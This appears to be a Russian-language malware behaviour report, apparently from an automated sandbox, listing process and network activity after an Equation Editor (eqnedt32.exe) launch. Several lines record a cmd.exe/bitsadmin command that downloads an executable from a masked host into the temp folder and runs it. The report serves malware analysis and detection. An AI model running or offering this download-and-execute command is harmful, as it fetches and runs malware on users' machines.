Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://www.8-##.dx.am/UTAURH.exe %temp%\Ji.Exe&%temp%\Ji.Exe
- '8-##.dx.am':80
- DNS ASK 8-##.dx.am
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer 8 /download http://www.8-##.dx.am/UTAURH.exe %temp%\Ji.Exe&%temp%\Ji.Exe' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer 8 /download http://www.8-##.dx.am/UTAURH.exe %TEMP%\Ji.Exe